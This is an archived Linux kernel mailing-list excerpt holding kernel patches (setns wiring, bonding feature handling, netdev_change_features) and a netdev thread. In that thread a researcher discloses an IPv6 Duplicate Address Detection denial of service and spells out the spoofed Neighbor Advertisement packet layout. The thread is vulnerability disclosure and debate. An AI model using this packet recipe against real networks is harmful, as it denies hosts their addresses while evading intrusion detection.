It seems I overlooked m68knommu when I wired up this syscall.

Reported-by:  Geert Uytterhoeven <geert@linux-m68k.org>
Signed-off-by: Eric W. Biederman <ebiederm@xmission.com>
---
 arch/m68k/kernel/entry_mm.S |    1 +
 1 files changed, 1 insertions(+), 0 deletions(-)

diff --git a/arch/m68k/kernel/entry_mm.S b/arch/m68k/kernel/entry_mm.S
index 1359ee6..e048015 100644
--- a/arch/m68k/kernel/entry_mm.S
+++ b/arch/m68k/kernel/entry_mm.S
@@ -754,4 +754,5 @@ sys_call_table:
 	.long sys_open_by_handle_at
 	.long sys_clock_adjtime
 	.long sys_syncfs
+	.long sys_setns
 
-- 
1.7.5.1.217.g4e3aa

--
To unsubscribe from this list: send the line "unsubscribe linux-fsdevel" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


* Re: Fwd: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform ICMPv6 packets
From: Eric Dumazet @ 2011-05-07 14:06 UTC
  To: Gervais Arthur; +Cc: Jan Ceuleers, netdev
In-Reply-To: <842648e0f4a8c6f7cd8a47cd6916a939@mail.insa-lyon.fr>

On Saturday 07 May 2011 at 15:54 +0200, Gervais Arthur wrote:

> Why would the victim itself claim to already have the IPv6 address?
> 

Why should it care? Please point me to the RFC saying it's illegal to send
or receive a frame with SRC_MAC == DST_MAC







* Re: [PATCH 7/7] ns: Wire up the setns system call
From: Mike Frysinger @ 2011-05-07 13:59 UTC
  To: Eric W. Biederman
  Cc: linux-arch, linux-kernel, netdev, linux-fsdevel, jamal,
	Daniel Lezcano, Linux Containers, Renato Westphal
In-Reply-To: <1304735101-1824-7-git-send-email-ebiederm@xmission.com>

On Fri, May 6, 2011 at 22:25, Eric W. Biederman wrote:
> v2: Most of the architecture support added by Daniel Lezcano <dlezcano@fr.ibm.com>
> v3: ported to v2.6.36-rc4 by: Eric W. Biederman <ebiederm@xmission.com>
> v4: Moved wiring up of the system call to another patch
> v5: ported to v2.6.39-rc6
>
>  arch/blackfin/include/asm/unistd.h     |    3 ++-
>  arch/blackfin/mach-common/entry.S      |    1 +

Acked-by: Mike Frysinger <vapier@gentoo.org>
-mike


* Re: [PATCH 2/7] ns: Introduce the setns syscall
From: Eric W. Biederman @ 2011-05-07 13:57 UTC
  To: Rémi Denis-Courmont
  Cc: linux-arch, linux-kernel, netdev, linux-fsdevel, jamal,
	Daniel Lezcano, Linux Containers, Renato Westphal
In-Reply-To: <201105071101.10950.remi@remlab.net>

"Rémi Denis-Courmont" <remi@remlab.net> writes:

> On Saturday 7 May 2011 05:24:56 Eric W. Biederman, you wrote:
>> Pieces of this puzzle can also be solved by coming up with
>> targeted system calls, perhaps socketat, that solve a subset
>> of the larger problem, instead of coming up with a general
>> purpose system call.  Overall that appears to be more work
>> for less reward.
>
> socketat() is still required for multithreaded namespace-aware userspace, I 
> believe.

The network namespace is a per task property so there are no problems
with multithreaded network namespace aware userspace applications.  The
implementation of a userspace socketat will still need to disable signal
handling around the network namespace switch to be signal safe.  Which
means that ultimately a kernel version of socketat may be desirable
for performance reasons, but I know of no correctness reasons to need
it.
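
A userspace socketat along those lines might be sketched like this. It is an illustration only, not code from the patchset: the name socketat_sketch is hypothetical, the raw syscall() form and the CLONE_NEWNET fallback follow the iproute2 patch posted in this thread, and the calling task's own namespace is reopened through /proc/<tid>/ns/net so it can switch back afterwards.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef CLONE_NEWNET
#define CLONE_NEWNET 0x40000000
#endif

/* Create a socket in the network namespace referred to by nsfd, then
 * return the calling task to its original namespace.  Returns the new
 * socket, or -1 on failure. */
static int socketat_sketch(int nsfd, int domain, int type, int protocol)
{
	char self_path[64];
	sigset_t all, old;
	int n, self_fd, sock = -1;

	/* Remember this task's own namespace so we can switch back. */
	n = snprintf(self_path, sizeof(self_path), "/proc/%ld/ns/net",
		     (long)syscall(SYS_gettid));
	assert(n > 0 && (size_t)n < sizeof(self_path));
	self_fd = open(self_path, O_RDONLY);
	if (self_fd < 0)
		return -1;

	/* Block signals so no handler runs in the foreign namespace.
	 * On Linux this affects the calling thread; pthread_sigmask() is
	 * the call POSIX specifies for threaded programs. */
	sigfillset(&all);
	sigprocmask(SIG_SETMASK, &all, &old);

	if (syscall(SYS_setns, nsfd, CLONE_NEWNET) == 0) {
		sock = socket(domain, type, protocol);
		/* If switching back fails, do not hand out the socket. */
		if (syscall(SYS_setns, self_fd, CLONE_NEWNET) != 0 && sock >= 0) {
			close(sock);
			sock = -1;
		}
	}

	sigprocmask(SIG_SETMASK, &old, NULL);
	close(self_fd);
	return sock;
}
```

The two namespace switches and the two signal mask changes per socket are the overhead a kernel socketat would avoid.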

For the time being I have simply removed socketat from what I plan to
merge because it is not strictly needed, I don't yet have a test case
for socketat, and I don't have as much time to work on this as I
would like.

There is one bug a multi-threaded network namespace aware user space
application might run into, and that is /proc/net is a symlink to
/proc/self/net.  Which means that if you open /proc/net/foo from a task
with a different network namespace than the task whose tid equals your
tgid, /proc/net will return the wrong file.  Still you can
avoid even that silliness by opening /proc/<tid>/net.
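
Building the per-task path is straightforward. The sketch below assumes the thread id is obtained with the gettid system call through syscall(); the helper name thread_proc_net_path is made up for illustration.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Write "/proc/<tid>/net/<name>" for the calling thread into buf.
 * Returns 0 on success, or -1 if the path does not fit. */
static int thread_proc_net_path(const char *name, char *buf, size_t size)
{
	int n;

	assert(name != NULL && buf != NULL && size > 0);
	n = snprintf(buf, size, "/proc/%ld/net/%s",
		     (long)syscall(SYS_gettid), name);
	return (n < 0 || (size_t)n >= size) ? -1 : 0;
}
```

A thread that has switched namespaces would open the path produced for "dev" instead of /proc/net/dev.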

Eric


* Re: Fwd: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform ICMPv6 packets
From: Gervais Arthur @ 2011-05-07 13:54 UTC
  To: Eric Dumazet; +Cc: Jan Ceuleers, netdev
In-Reply-To: <1304774758.2821.1237.camel@edumazet-laptop>

On 05/07/2011 03:25 PM, Eric Dumazet wrote:
> On Saturday 07 May 2011 at 15:17 +0200, Gervais Arthur wrote:
>> On 05/07/2011 03:10 PM, Eric Dumazet wrote:
>>> On Saturday 07 May 2011 at 14:55 +0200, Jan Ceuleers wrote:
>>>> The networking folks are on netdev
>>>>
>>>> -------- Original Message --------
>>>> Subject: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform
>>>> ICMPv6 packets
>>>> Date: Thu, 05 May 2011 11:52:05 +0200
>>>> From: Gervais Arthur<arthur.gervais@insa-lyon.fr>
>>>> To:<linux-kernel@vger.kernel.org>
>>>> CC:<arthur.gervais@insa-lyon.fr>
>>>>
>>>> [1.] One line summary of the problem:
>>>>
>>>> A specially crafted Ethernet ICMPv6 packet which is not conform to the
>>>> RFC can perform a IPv6 Duplicate Address Detection Failure.
>>>>
>>>> [2.] Full description of the problem/report:
>>>>
>>>> If a new IPv6 node joins the local area network, the new node sends an
>>>> ICMPv6 Neighbor Solicitation packet in order to check if the
>>>> self-generated local-link IPv6 address already occupied is.
>>>>
>>>> An attacker can answer to this Neighbor Solicitation packet with an
>>>> ICMPv6 Neighbor Advertisement packet, so that the new IPv6 node is not
>>>> able to associate the just generated IPv6 address.
>>>> -- This problem is well known and IPv6 related.
>>>>
>>>> The new problem is that the attacker can modify the Ethernet Neighbor
>>>> Advertisement packets, so that they are not RFC conform and so that it
>>>> is even more difficult to detect the attacker.
>>>>
>>>> If an attacker sends the following packet, duplicate address detection
>>>> fails on Linux:
>>>>
>>>> Ethernet Layer: 	Victim MAC -->   Victim MAC
>>>> IPv6 Layer:		fe80::200:edff:feXX:XXXX -->   ff02::1
>>>> 			ICMPv6
>>>> 			  Type 136 (Neighbor Advertisement)
>>>> 			  Target: fe80::200:edff:feXX:XXXX
>>>> 			ICMPv6 Option
>>>> 			  Type 2 (Target link-layer address) Victim MAC
>>>>
>>>> Please find attached a drawing and a proof of concept.
>>>>
>>>> [3.] Keywords (i.e., modules, networking, kernel):
>>>>
>>>> Network, IPv6, Duplicate Address Detection
>>>>
>>>> [4.] Kernel version (from /proc/version):
>>>>
>>>> Latest tested:
>>>> Linux version 2.6.35-22-generic (buildd@rothera) (gcc version 4.4.5
>>>> (Ubuntu/Linaro 4.4.4-14ubuntu4) ) #33-Ubuntu SMP Sun Sep 19 20:34:50 UTC
>>>> 2010
>>>> (and before most probably)
>>>>
>>>> [6.] A small shell script or example program which triggers the
>>>>          problem (if possible)
>>>>
>>>> Please find attached a python script demonstrating the problem.
>>>>
>>>> [X.] Other notes, patches, fixes, workarounds:
>>>>
>>>> The Linux Kernel should not accept incoming Ethernet packets originating
>>>> from an internal Ethernet card (identified by the MAC address)
>>>>
>>>
>>> I fail to understand the problem.
>>>
>>> The attacker might use any kind of source MAC address to fool 'Victim'
>>> or 'network admins'
>>>
>>> Why one particular address should be avoided ?
>>>
>>>
>>>
>>
>> Currently the IPv6 implementation says (from the victims view):
>> I send a Neighbor Solicitation for a given IPv6 address to check the
>> duplicate address detection.
>>
>> If I then receive a Neighbor Advertisement packet from my MAC address,
>> to my MAC address, with ICMPv6 target option my MAC address, then the
>> requested IPv6 address must already be used and I cannot take it.
>>
>> I think such a packet should never be allowed to be accepted, because
>> the victim just asked if the address is free.
>>
>> If such a packet is accepted, it is even more difficult to find the
>> attacker.
>>
>

If the network administrator is using an IDS such as NDPMon
(http://ndpmon.sourceforge.net/) to detect DAD DoS attacks, and the
attacker changes the MAC address as I described, the IDS will no longer
detect the attack (because the victim itself appears to claim that it
already has the IPv6 address).

> What prevents the attacker to use random source Mac addresses,
> or using legit ones learnt from packet sniffing ?
>

Of course an attacker could use a random source MAC address, or any
other source MAC address that already exists on the network, but the IDS
will know (depending on how it works) that this MAC address does not
have this IPv6 address associated with it, and therefore that a DAD DoS
is happening.
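
To make that concrete, here is a minimal sketch of such a binding check.
It is only an assumption about how an IDS could work, not NDPMon's actual
logic; the function name na_looks_spoofed and the bindings table are made
up for illustration.

```python
import ipaddress


def na_looks_spoofed(bindings, src_mac, target):
    """Return True if src_mac is not known to own the advertised target.

    bindings is an assumed table mapping a lowercase MAC address to the
    set of ipaddress.IPv6Address objects the IDS has seen that MAC use.
    """
    known = bindings.get(src_mac.lower(), set())
    return ipaddress.IPv6Address(target) not in known
```

With a random or borrowed source MAC the check returns True and the
attack is flagged. If the IDS has already recorded the victim's tentative
address against the victim's MAC (for example from the victim's own
Neighbor Solicitation), an advertisement carrying the victim's MAC passes
the check, which is the case I described.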

> Why only one given mac address is to be avoided, out of billions other ?
>

Why would the victim itself claim already having the IPv6 address?

> This would be a strange precedent. Practically nowhere we check incoming
> mac addresses from incoming packets. (only on netfilter it can be
> optionally done)
>

Yes, I understand this point. But it is not only the source MAC
address of the Ethernet frame; the "target link-layer address" in the
ICMPv6 option is also involved in this case.

> If you have a host with say one thousand NICS, should we make sure the
> packet we receive has not one of the thousand mac addresses we currently
> have on this host ?

I sent the bug to this list because I don't think this is an
NDPMon-specific problem. Windows, for example, does not accept packets
crafted the way I described.

Maybe this is not an OS-specific problem, but attacks would be easier to
detect if those packets were not accepted.


^ permalink raw reply

* Re: Fwd: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform ICMPv6 packets
From: Eric Dumazet @ 2011-05-07 13:25 UTC (permalink / raw)
  To: Gervais Arthur; +Cc: Jan Ceuleers, netdev
In-Reply-To: <dc9a790de083b31ff85c0b9578c980e7@mail.insa-lyon.fr>

Le samedi 07 mai 2011 à 15:17 +0200, Gervais Arthur a écrit :
> On 05/07/2011 03:10 PM, Eric Dumazet wrote:
> > Le samedi 07 mai 2011 à 14:55 +0200, Jan Ceuleers a écrit :
> >> The networking folks are on netdev
> >>
> >> -------- Original Message --------
> >> Subject: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform
> >> ICMPv6 packets
> >> Date: Thu, 05 May 2011 11:52:05 +0200
> >> From: Gervais Arthur<arthur.gervais@insa-lyon.fr>
> >> To:<linux-kernel@vger.kernel.org>
> >> CC:<arthur.gervais@insa-lyon.fr>
> >>
> >> [1.] One line summary of the problem:
> >>
> >> A specially crafted Ethernet ICMPv6 packet which is not conform to the
> >> RFC can perform a IPv6 Duplicate Address Detection Failure.
> >>
> >> [2.] Full description of the problem/report:
> >>
> >> If a new IPv6 node joins the local area network, the new node sends an
> >> ICMPv6 Neighbor Solicitation packet in order to check if the
> >> self-generated local-link IPv6 address already occupied is.
> >>
> >> An attacker can answer to this Neighbor Solicitation packet with an
> >> ICMPv6 Neighbor Advertisement packet, so that the new IPv6 node is not
> >> able to associate the just generated IPv6 address.
> >> -- This problem is well known and IPv6 related.
> >>
> >> The new problem is that the attacker can modify the Ethernet Neighbor
> >> Advertisement packets, so that they are not RFC conform and so that it
> >> is even more difficult to detect the attacker.
> >>
> >> If an attacker sends the following packet, duplicate address detection
> >> fails on Linux:
> >>
> >> Ethernet Layer: 	Victim MAC -->  Victim MAC
> >> IPv6 Layer:		fe80::200:edff:feXX:XXXX -->  ff02::1
> >> 			ICMPv6
> >> 			  Type 136 (Neighbor Advertisement)
> >> 			  Target: fe80::200:edff:feXX:XXXX
> >> 			ICMPv6 Option
> >> 			  Type 2 (Target link-layer address) Victim MAC
> >>
> >> Please find attached a drawing and a proof of concept.
> >>
> >> [3.] Keywords (i.e., modules, networking, kernel):
> >>
> >> Network, IPv6, Duplicate Address Detection
> >>
> >> [4.] Kernel version (from /proc/version):
> >>
> >> Latest tested:
> >> Linux version 2.6.35-22-generic (buildd@rothera) (gcc version 4.4.5
> >> (Ubuntu/Linaro 4.4.4-14ubuntu4) ) #33-Ubuntu SMP Sun Sep 19 20:34:50 UTC
> >> 2010
> >> (and before most probably)
> >>
> >> [6.] A small shell script or example program which triggers the
> >>         problem (if possible)
> >>
> >> Please find attached a python script demonstrating the problem.
> >>
> >> [X.] Other notes, patches, fixes, workarounds:
> >>
> >> The Linux Kernel should not accept incoming Ethernet packets originating
> >> from an internal Ethernet card (identified by the MAC address)
> >>
> >
> > I fail to understand the problem.
> >
> > The attacker might use any kind of source MAC address to fool 'Victim'
> > or 'network admins'
> >
> > Why one particular address should be avoided ?
> >
> >
> >
> 
> Currently the IPv6 implementation says (from the victims view):
> I send a Neighbor Solicitation for a given IPv6 address to check the 
> duplicate address detection.
> 
> If I then receive a Neighbor Advertisement packet from my MAC address, 
> to my MAC address, with ICMPv6 target option my MAC address, then the 
> requested IPv6 address must already be used and I cannot take it.
> 
> I think such a packet should never be allowed to be accepted, because 
> the victim just asked if the address is free.
> 
> If such a packet is accepted, it is even more difficult to find the 
> attacker.
> 

What prevents the attacker to use random source Mac addresses,
or using legit ones learnt from packet sniffing ?

Why only one given mac address is to be avoided, out of billions other ?

This would be a strange precedent. Practically nowhere we check incoming
mac addresses from incoming packets. (only on netfilter it can be
optionally done)

If you have a host with say one thousand NICS, should we make sure the
packet we receive has not one of the thousand mac addresses we currently
have on this host ?




^ permalink raw reply

* [PATCH v2] bonding: convert to ndo_fix_features
From: Michał Mirosław @ 2011-05-07 13:22 UTC (permalink / raw)
  To: netdev; +Cc: Jay Vosburgh, Andy Gospodarek
In-Reply-To: <20110506175629.BC59D1389B@rere.qmqm.pl>

This should also fix updating of vlan_features and propagating changes to
VLAN devices on the bond.

Side effect: it allows user to force-disable some offloads on the bond
interface.

Note: NETIF_F_VLAN_CHALLENGED is managed by bond_fix_features() now.

Signed-off-by: Michał Mirosław <mirq-linux@rere.qmqm.pl>
---

Note: Depends on netdev_change_features() patch.

v2:	- use netdev_change_features()
	- fix locking around bond_compute_features()

 drivers/net/bonding/bond_main.c |  161 ++++++++++++++++----------------------
 1 files changed, 68 insertions(+), 93 deletions(-)

diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
index 9a5feaf..36ff316 100644
--- a/drivers/net/bonding/bond_main.c
+++ b/drivers/net/bonding/bond_main.c
@@ -344,32 +344,6 @@ out:
 }
 
 /**
- * bond_has_challenged_slaves
- * @bond: the bond we're working on
- *
- * Searches the slave list. Returns 1 if a vlan challenged slave
- * was found, 0 otherwise.
- *
- * Assumes bond->lock is held.
- */
-static int bond_has_challenged_slaves(struct bonding *bond)
-{
-	struct slave *slave;
-	int i;
-
-	bond_for_each_slave(bond, slave, i) {
-		if (slave->dev->features & NETIF_F_VLAN_CHALLENGED) {
-			pr_debug("found VLAN challenged slave - %s\n",
-				 slave->dev->name);
-			return 1;
-		}
-	}
-
-	pr_debug("no VLAN challenged slaves found\n");
-	return 0;
-}
-
-/**
  * bond_next_vlan - safely skip to the next item in the vlans list.
  * @bond: the bond we're working on
  * @curr: item we're advancing from
@@ -1406,52 +1380,68 @@ static int bond_sethwaddr(struct net_device *bond_dev,
 	return 0;
 }
 
-#define BOND_VLAN_FEATURES \
-	(NETIF_F_VLAN_CHALLENGED | NETIF_F_HW_VLAN_RX | NETIF_F_HW_VLAN_TX | \
-	 NETIF_F_HW_VLAN_FILTER)
-
-/*
- * Compute the common dev->feature set available to all slaves.  Some
- * feature bits are managed elsewhere, so preserve those feature bits
- * on the master device.
- */
-static int bond_compute_features(struct bonding *bond)
+static u32 bond_fix_features(struct net_device *dev, u32 features)
 {
 	struct slave *slave;
-	struct net_device *bond_dev = bond->dev;
-	u32 features = bond_dev->features;
-	u32 vlan_features = 0;
-	unsigned short max_hard_header_len = max((u16)ETH_HLEN,
-						bond_dev->hard_header_len);
+	struct bonding *bond = netdev_priv(dev);
+	u32 mask;
 	int i;
 
-	features &= ~(NETIF_F_ALL_CSUM | BOND_VLAN_FEATURES);
-	features |=  NETIF_F_GSO_MASK | NETIF_F_NO_CSUM | NETIF_F_NOCACHE_COPY;
+	read_lock(&bond->lock);
 
-	if (!bond->first_slave)
-		goto done;
+	if (!bond->first_slave) {
+		/* Disable adding VLANs to empty bond. But why? --mq */
+		features |= NETIF_F_VLAN_CHALLENGED;
+		goto out;
+	}
 
+	mask = features;
 	features &= ~NETIF_F_ONE_FOR_ALL;
+	features |= NETIF_F_ALL_FOR_ALL;
 
-	vlan_features = bond->first_slave->dev->vlan_features;
 	bond_for_each_slave(bond, slave, i) {
 		features = netdev_increment_features(features,
 						     slave->dev->features,
-						     NETIF_F_ONE_FOR_ALL);
+						     mask);
+	}
+
+out:
+	read_unlock(&bond->lock);
+	return features;
+}
+
+#define BOND_VLAN_FEATURES	(NETIF_F_ALL_TX_OFFLOADS | \
+				 NETIF_F_SOFT_FEATURES | \
+				 NETIF_F_LRO)
+
+static void bond_compute_features(struct bonding *bond)
+{
+	struct slave *slave;
+	struct net_device *bond_dev = bond->dev;
+	u32 vlan_features = BOND_VLAN_FEATURES;
+	unsigned short max_hard_header_len = ETH_HLEN;
+	int i;
+
+	read_lock(&bond->lock);
+
+	if (!bond->first_slave)
+		goto done;
+
+	bond_for_each_slave(bond, slave, i) {
 		vlan_features = netdev_increment_features(vlan_features,
-							slave->dev->vlan_features,
-							NETIF_F_ONE_FOR_ALL);
+			slave->dev->vlan_features, BOND_VLAN_FEATURES);
+
 		if (slave->dev->hard_header_len > max_hard_header_len)
 			max_hard_header_len = slave->dev->hard_header_len;
 	}
 
 done:
-	features |= (bond_dev->features & BOND_VLAN_FEATURES);
-	bond_dev->features = netdev_fix_features(bond_dev, features);
-	bond_dev->vlan_features = netdev_fix_features(bond_dev, vlan_features);
+	bond_dev->vlan_features = vlan_features;
 	bond_dev->hard_header_len = max_hard_header_len;
 
-	return 0;
+	read_unlock(&bond->lock);
+
+	netdev_change_features(bond_dev);
 }
 
 static void bond_setup_by_slave(struct net_device *bond_dev,
@@ -1544,7 +1534,6 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev)
 	struct netdev_hw_addr *ha;
 	struct sockaddr addr;
 	int link_reporting;
-	int old_features = bond_dev->features;
 	int res = 0;
 
 	if (!bond->params.use_carrier && slave_dev->ethtool_ops == NULL &&
@@ -1577,16 +1566,9 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev)
 			pr_warning("%s: Warning: enslaved VLAN challenged slave %s. Adding VLANs will be blocked as long as %s is part of bond %s\n",
 				   bond_dev->name, slave_dev->name,
 				   slave_dev->name, bond_dev->name);
-			bond_dev->features |= NETIF_F_VLAN_CHALLENGED;
 		}
 	} else {
 		pr_debug("%s: ! NETIF_F_VLAN_CHALLENGED\n", slave_dev->name);
-		if (bond->slave_cnt == 0) {
-			/* First slave, and it is not VLAN challenged,
-			 * so remove the block of adding VLANs over the bond.
-			 */
-			bond_dev->features &= ~NETIF_F_VLAN_CHALLENGED;
-		}
 	}
 
 	/*
@@ -1775,10 +1757,10 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev)
 	new_slave->delay = 0;
 	new_slave->link_failure_count = 0;
 
-	bond_compute_features(bond);
-
 	write_unlock_bh(&bond->lock);
 
+	bond_compute_features(bond);
+
 	read_lock(&bond->lock);
 
 	new_slave->last_arp_rx = jiffies;
@@ -1958,7 +1940,7 @@ err_free:
 	kfree(new_slave);
 
 err_undo_flags:
-	bond_dev->features = old_features;
+	bond_compute_features(bond);
 
 	return res;
 }
@@ -1979,6 +1961,7 @@ int bond_release(struct net_device *bond_dev, struct net_device *slave_dev)
 	struct bonding *bond = netdev_priv(bond_dev);
 	struct slave *slave, *oldcurrent;
 	struct sockaddr addr;
+	u32 old_features = bond_dev->features;
 
 	/* slave is not a slave or master is not master of this slave */
 	if (!(slave_dev->flags & IFF_SLAVE) ||
@@ -2039,8 +2022,6 @@ int bond_release(struct net_device *bond_dev, struct net_device *slave_dev)
 	/* release the slave from its bond */
 	bond_detach_slave(bond, slave);
 
-	bond_compute_features(bond);
-
 	if (bond->primary_slave == slave)
 		bond->primary_slave = NULL;
 
@@ -2084,23 +2065,22 @@ int bond_release(struct net_device *bond_dev, struct net_device *slave_dev)
 		 */
 		memset(bond_dev->dev_addr, 0, bond_dev->addr_len);
 
-		if (!bond->vlgrp) {
-			bond_dev->features |= NETIF_F_VLAN_CHALLENGED;
-		} else {
+		if (bond->vlgrp) {
 			pr_warning("%s: Warning: clearing HW address of %s while it still has VLANs.\n",
 				   bond_dev->name, bond_dev->name);
 			pr_warning("%s: When re-adding slaves, make sure the bond's HW address matches its VLANs'.\n",
 				   bond_dev->name);
 		}
-	} else if ((bond_dev->features & NETIF_F_VLAN_CHALLENGED) &&
-		   !bond_has_challenged_slaves(bond)) {
+	}
+
+	write_unlock_bh(&bond->lock);
+	unblock_netpoll_tx();
+
+	bond_compute_features(bond);
+	if (!(bond_dev->features & NETIF_F_VLAN_CHALLENGED) &&
+	    (old_features & NETIF_F_VLAN_CHALLENGED))
 		pr_info("%s: last VLAN challenged slave %s left bond %s. VLAN blocking is removed\n",
 			bond_dev->name, slave_dev->name, bond_dev->name);
-		bond_dev->features &= ~NETIF_F_VLAN_CHALLENGED;
-	}
-
-	write_unlock_bh(&bond->lock);
-	unblock_netpoll_tx();
 
 	/* must do this from outside any spinlocks */
 	bond_destroy_slave_symlinks(bond_dev, slave_dev);
@@ -2219,8 +2199,6 @@ static int bond_release_all(struct net_device *bond_dev)
 			bond_alb_deinit_slave(bond, slave);
 		}
 
-		bond_compute_features(bond);
-
 		bond_destroy_slave_symlinks(bond_dev, slave_dev);
 		bond_del_vlans_from_slave(bond, slave_dev);
 
@@ -2269,9 +2247,7 @@ static int bond_release_all(struct net_device *bond_dev)
 	 */
 	memset(bond_dev->dev_addr, 0, bond_dev->addr_len);
 
-	if (!bond->vlgrp) {
-		bond_dev->features |= NETIF_F_VLAN_CHALLENGED;
-	} else {
+	if (bond->vlgrp) {
 		pr_warning("%s: Warning: clearing HW address of %s while it still has VLANs.\n",
 			   bond_dev->name, bond_dev->name);
 		pr_warning("%s: When re-adding slaves, make sure the bond's HW address matches its VLANs'.\n",
@@ -2282,6 +2258,9 @@ static int bond_release_all(struct net_device *bond_dev)
 
 out:
 	write_unlock_bh(&bond->lock);
+
+	bond_compute_features(bond);
+
 	return 0;
 }
 
@@ -4347,11 +4326,6 @@ static void bond_ethtool_get_drvinfo(struct net_device *bond_dev,
 static const struct ethtool_ops bond_ethtool_ops = {
 	.get_drvinfo		= bond_ethtool_get_drvinfo,
 	.get_link		= ethtool_op_get_link,
-	.get_tx_csum		= ethtool_op_get_tx_csum,
-	.get_sg			= ethtool_op_get_sg,
-	.get_tso		= ethtool_op_get_tso,
-	.get_ufo		= ethtool_op_get_ufo,
-	.get_flags		= ethtool_op_get_flags,
 };
 
 static const struct net_device_ops bond_netdev_ops = {
@@ -4377,6 +4351,7 @@ static const struct net_device_ops bond_netdev_ops = {
 #endif
 	.ndo_add_slave		= bond_enslave,
 	.ndo_del_slave		= bond_release,
+	.ndo_fix_features	= bond_fix_features,
 };
 
 static void bond_destructor(struct net_device *bond_dev)
@@ -4432,14 +4407,14 @@ static void bond_setup(struct net_device *bond_dev)
 	 * when there are slaves that are not hw accel
 	 * capable
 	 */
-	bond_dev->features |= (NETIF_F_HW_VLAN_TX |
-			       NETIF_F_HW_VLAN_RX |
-			       NETIF_F_HW_VLAN_FILTER);
 
-	/* By default, we enable GRO on bonding devices.
-	 * Actual support requires lowlevel drivers are GRO ready.
-	 */
-	bond_dev->features |= NETIF_F_GRO;
+	bond_dev->hw_features = BOND_VLAN_FEATURES |
+				NETIF_F_HW_VLAN_TX |
+				NETIF_F_HW_VLAN_RX |
+				NETIF_F_HW_VLAN_FILTER;
+
+	bond_dev->hw_features &= ~(NETIF_F_ALL_CSUM & ~NETIF_F_NO_CSUM);
+	bond_dev->features |= bond_dev->hw_features;
 }
 
 static void bond_work_cancel_all(struct bonding *bond)
-- 
1.7.2.5


^ permalink raw reply related

* [PATCH] net: introduce netdev_change_features()
From: Michał Mirosław @ 2011-05-07 13:22 UTC (permalink / raw)
  To: netdev

It will be needed by bonding and other drivers changing vlan_features
after ndo_init callback.

As a bonus, this includes kernel-doc for netdev_update_features().

Signed-off-by: Michał Mirosław <mirq-linux@rere.qmqm.pl>
---
 include/linux/netdevice.h |    1 +
 net/core/dev.c            |   25 +++++++++++++++++++++++++
 2 files changed, 26 insertions(+), 0 deletions(-)

diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
index d5de66a..686af72 100644
--- a/include/linux/netdevice.h
+++ b/include/linux/netdevice.h
@@ -2560,6 +2560,7 @@ u32 netdev_increment_features(u32 all, u32 one, u32 mask);
 u32 netdev_fix_features(struct net_device *dev, u32 features);
 int __netdev_update_features(struct net_device *dev);
 void netdev_update_features(struct net_device *dev);
+void netdev_change_features(struct net_device *dev);
 
 void netif_stacked_transfer_operstate(const struct net_device *rootdev,
 					struct net_device *dev);
diff --git a/net/core/dev.c b/net/core/dev.c
index 44ef8f8..c91d14c 100644
--- a/net/core/dev.c
+++ b/net/core/dev.c
@@ -5287,6 +5287,14 @@ int __netdev_update_features(struct net_device *dev)
 	return 1;
 }
 
+/**
+ *	netdev_update_features - recalculate device features
+ *	@dev: the device to check
+ *
+ *	Recalculate dev->features set and send notifications if it
+ *	has changed. Should be called after driver or hardware dependent
+ *	conditions might have changed that influence the features.
+ */
 void netdev_update_features(struct net_device *dev)
 {
 	if (__netdev_update_features(dev))
@@ -5295,6 +5303,23 @@ void netdev_update_features(struct net_device *dev)
 EXPORT_SYMBOL(netdev_update_features);
 
 /**
+ *	netdev_change_features - recalculate device features
+ *	@dev: the device to check
+ *
+ *	Recalculate dev->features set and send notifications even
+ *	if they have not changed. Should be called instead of
+ *	netdev_update_features() if also dev->vlan_features might
+ *	have changed to allow the changes to be propagated to stacked
+ *	VLAN devices.
+ */
+void netdev_change_features(struct net_device *dev)
+{
+	__netdev_update_features(dev);
+	netdev_features_change(dev);
+}
+EXPORT_SYMBOL(netdev_change_features);
+
+/**
  *	netif_stacked_transfer_operstate -	transfer operstate
  *	@rootdev: the root or lower level device to transfer state from
  *	@dev: the device to transfer operstate to
-- 
1.7.2.5


^ permalink raw reply related

* Re: Fwd: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform ICMPv6 packets
From: Gervais Arthur @ 2011-05-07 13:05 UTC (permalink / raw)
  To: netdev
In-Reply-To: <4DC54157.9010306@computer.org>

[-- Attachment #1: Type: text/plain, Size: 2499 bytes --]

I made a small mistake in the proof of concept code.

Please find attached the corrected version (2 lines are modified)

Best regards,

Arthur Gervais


On 05/07/2011 02:55 PM, Jan Ceuleers wrote:
> The networking folks are on netdev
>
> -------- Original Message --------
> Subject: PROBLEM: IPv6 Duplicate Address Detection with non RFC-conform
> ICMPv6 packets
> Date: Thu, 05 May 2011 11:52:05 +0200
> From: Gervais Arthur <arthur.gervais@insa-lyon.fr>
> To: <linux-kernel@vger.kernel.org>
> CC: <arthur.gervais@insa-lyon.fr>
>
> [1.] One line summary of the problem:
>
> A specially crafted Ethernet ICMPv6 packet which is not conform to the
> RFC can perform a IPv6 Duplicate Address Detection Failure.
>
> [2.] Full description of the problem/report:
>
> If a new IPv6 node joins the local area network, the new node sends an
> ICMPv6 Neighbor Solicitation packet in order to check if the
> self-generated local-link IPv6 address already occupied is.
>
> An attacker can answer to this Neighbor Solicitation packet with an
> ICMPv6 Neighbor Advertisement packet, so that the new IPv6 node is not
> able to associate the just generated IPv6 address.
> -- This problem is well known and IPv6 related.
>
> The new problem is that the attacker can modify the Ethernet Neighbor
> Advertisement packets, so that they are not RFC conform and so that it
> is even more difficult to detect the attacker.
>
> If an attacker sends the following packet, duplicate address detection
> fails on Linux:
>
> Ethernet Layer: Victim MAC --> Victim MAC
